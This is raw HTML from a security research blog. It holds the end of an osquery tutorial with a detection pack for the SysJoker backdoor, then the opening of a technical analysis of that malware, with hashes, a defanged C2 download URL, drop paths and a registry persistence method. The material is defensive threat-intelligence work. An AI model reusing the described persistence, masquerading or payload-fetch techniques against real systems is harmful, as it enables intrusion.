class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Next Steps&lt;span class="hx:absolute hx:-mt-20" id="next-steps"&gt;&lt;/span&gt;
&lt;a href="#next-steps" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The next step is to tell the osquery daemon to load the query pack we created. This can be done by adding a pack entry to the daemon&amp;rsquo;s configuration file:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;packs&amp;#34;&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;sysjoker&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/path/to/pack/sysjoker.json&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Once the pack has been loaded the daemon will log result to the result log. To get alerts when matches have been found, the logs can be forward to a SIEM. (The process of configuring log forwarding to a SIEM is out of scope of this and will not be covered.)&lt;/p&gt;
&lt;p&gt;When using packs the name of the query will be prepended by the pack name, making it easy to create an alert. For example in this tutorial, all queries with a result will have a name starting with &lt;code&gt;pack_sysjoker&lt;/code&gt;. If you don&amp;rsquo;t want to create a pack from scratch, you can use the pack provided in the appendix below.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Appendix A – sysjoker.json Pack&lt;span class="hx:absolute hx:-mt-20" id="appendix-a--sysjokerjson-pack"&gt;&lt;/span&gt;
&lt;a href="#appendix-a--sysjokerjson-pack" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;queries&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;linux-artifacts&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT path, filename, username, groupname, mtime, ctime, atime, md5, sha1, sha256 FROM file
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN users using (uid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN hash using (path)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN groups using (gid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; WHERE file.directory in (&amp;#39;/.Library&amp;#39;);&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;linux&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible SysJoker Linux files&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;macos-artifacts&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT path, filename, username, groupname, mtime, ctime, atime, md5, sha1, sha256 FROM file
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN users using (uid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN hash using (path)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN groups using (gid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; WHERE file.directory in (&amp;#39;/Library/MacOsServices&amp;#39;);&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;darwin&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible SysJoker macOS files&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;windows-artifacts&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT path, filename, username, groupname, mtime, ctime, atime, md5, sha1, sha256 FROM file
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN users using (uid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN hash using (path)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN groups using (gid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; WHERE file.directory in (&amp;#39;C:\ProgramData\RecoverySystem&amp;#39;, &amp;#39;C:\ProgramData\SystemData&amp;#39;);&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;windows&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible SysJoker Windows files&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;linux-cron&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT * FROM crontab
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; WHERE command LIKE &amp;#39;@reboot%&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; AND command LIKE &amp;#39;%updateSystem)&amp;#39;;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;linux&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible SysJoker crontab entry&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;macos-plist&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;select * from launchd where path like &amp;#39;%com.apple.update.plist&amp;#39;;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;darwin&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible SysJoker macOS plist entry&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;win-registry&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT * FROM registry WHERE key LIKE &amp;#39;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&amp;#39; AND name = &amp;#39;igfxCUIService&amp;#39;;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;windows&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible SysJoker Windows registry entry&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>New SysJoker Backdoor Targets Windows, Linux, and macOS</title><link>https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/</link><pubDate>Tue, 11 Jan 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/</guid><description>
&lt;p&gt;Malware targeting multiple operating systems has become no exception in the
malware threat landscape.
&lt;a href="../../../2021/09/vermilionstrike-reimplementation-cobaltstrike"&gt;Vermilion Strike&lt;/a&gt;,
which was documented just last September, is among the latest examples until
now.&lt;/p&gt;
&lt;p&gt;In December 2021, we discovered a new multi-platform backdoor that targets
Windows, Mac, and Linux. The Linux and Mac versions are fully undetected in
VirusTotal. We named this backdoor &lt;strong&gt;SysJoker&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;SysJoker was first discovered during an active attack on a Linux-based web
server of a leading educational institution. After further investigation, we
found that SysJoker also has Mach-O and Windows PE versions. Based on Command
and Control (C2) domain registration and samples found in VirusTotal, we
estimate that the SysJoker attack was initiated during the second half of 2021.&lt;/p&gt;
&lt;p&gt;SysJoker masquerades as a system update and generates its C2 by decoding a
string retrieved from a text file hosted on Google Drive. During our analysis
the C2 changed three times, indicating the attacker is active and monitoring
for infected machines. Based on victimology and malware&amp;rsquo;s behavior, we assess
that SysJoker is after specific targets.&lt;/p&gt;
&lt;p&gt;SysJoker was uploaded to VirusTotal with the suffix .ts which is used for
&lt;a href="https://en.wikipedia.org/wiki/TypeScript"target="_blank" rel="noopener"&gt;TypeScript&lt;/a&gt; files. A possible attack
vector for this malware is via an infected npm package.&lt;/p&gt;
&lt;p&gt;Below we provide a technical analysis of this malware together with IoCs and
detection and response mitigations.&lt;/p&gt;
&lt;h2&gt;Technical Analysis of SysJoker&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis-of-sysjoker"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis-of-sysjoker" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The malware is written in C++ and each sample is tailored for the specific
operating system it targets. Both the macOS and Linux samples are fully
undetected in VirusTotal.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig1.png" title="e06e06752509f9cd8bc85aa1aa24dba2 in VirusTotal targeting Mac M1 processor" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;e06e06752509f9cd8bc85aa1aa24dba2 in VirusTotal targeting Mac M1 processor&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Behavioral Analysis&lt;span class="hx:absolute hx:-mt-20" id="behavioral-analysis"&gt;&lt;/span&gt;
&lt;a href="#behavioral-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;SysJoker&amp;rsquo;s behavior is similar for all three operating systems. We will analyze
SysJoker&amp;rsquo;s behavior on Windows.&lt;/p&gt;
&lt;p&gt;Unlike Mac and Linux samples, the Windows version contains a first-stage
dropper. The dropper (&lt;code&gt;d71e1a6ee83221f1ac7ed870bc272f01&lt;/code&gt;) is a DLL that was
uploaded to VirusTotal as &lt;code&gt;style-loader.ts&lt;/code&gt; and has only 6 detections at the
time of this writing.&lt;/p&gt;
&lt;p&gt;The Dropper drops a zipped SysJoker (&lt;code&gt;53f1bb23f670d331c9041748e7e8e396&lt;/code&gt;) from
C2 &lt;code&gt;https[://]github[.]url-mini[.]com/msg.zip&lt;/code&gt;, copies it to
&lt;code&gt;C:\ProgramData\Recovery\Systemrecovery\Windows.zip&lt;/code&gt;, unzips it and executes
it. All of these actions are executed via PowerShell commands.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig2.png" title="Process tree showing PowerShell commands." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Process tree showing PowerShell commands.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Once SysJoker (&lt;code&gt;d90d0f4d6dad402b5d025987030cc87c&lt;/code&gt;) is executed it sleeps for a
random duration between 90 to 120 seconds. Then, it will create the
&lt;code&gt;C:\ProgramData\SystemData&lt;/code&gt; directory and copy itself under this directory,
masquerading as &lt;code&gt;igfxCUIService.exe&lt;/code&gt; (igfxCUIService stands for Intel Graphics
Common User Interface Service). Next, it will gather information about the
machine using Living off the Land (LOtL) commands. SysJoker uses different
temporary text files to log the results of the commands. These text files are
deleted immediately, stored in a JSON object, and then encoded and written to a
file named &lt;code&gt;microsoft_windows.dll&lt;/code&gt;. The figure below shows the JSON object
built in memory by SysJoker.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig3.png" title="JSON object built in memory by SysJoker." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;JSON object built in memory by SysJoker.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;It will gather the MAC address, user name, physical media serial number, and IP
address (see IoCs section for the full commands list). SysJoker will create
persistence by adding an entry to the registry run key
&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;. Between each
of the steps above, the malware sleeps for a random duration.&lt;/p&gt;
